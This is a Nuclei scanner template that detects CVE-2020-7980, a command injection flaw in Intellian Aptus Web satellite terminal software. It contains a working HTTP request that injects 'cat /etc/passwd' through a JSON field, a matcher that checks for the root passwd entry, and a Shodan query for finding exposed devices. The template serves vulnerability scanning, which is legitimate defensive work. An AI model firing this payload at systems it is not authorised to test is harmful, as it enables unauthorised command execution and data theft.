nuclei-templates/cves/2020/CVE-2020-7980.yaml

42 lines
1.2 KiB
YAML

id: CVE-2020-7980
info:
name: Satellian Intellian Aptus Web <= 1.24 - Remote Command Execution
author: ritikchaddha
severity: critical
description: "Intellian Aptus Web 1.24 allows remote attackers to execute arbitrary OS commands via the Q field within JSON data to the cgi-bin/libagent.cgi URI. NOTE: a valid sid cookie for a login to the intellian default account might be needed."
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2020-7980
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2020-7980
cwe-id: CWE-78
metadata:
shodan-query: http.title:"Intellian Aptus Web"
tags: satellian,rce,cve,cve2020,intellian,aptus
requests:
- raw:
- |
POST /cgi-bin/libagent.cgi?type=J HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: ctr_t=0; sid=123456789
{"O_": "A", "F_": "EXEC_CMD", "S_": 123456789, "P1_": {"Q": "cat /etc/passwd", "F": "EXEC_CMD"}, "V_": 1}
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# Enhanced by mp on 2022/04/29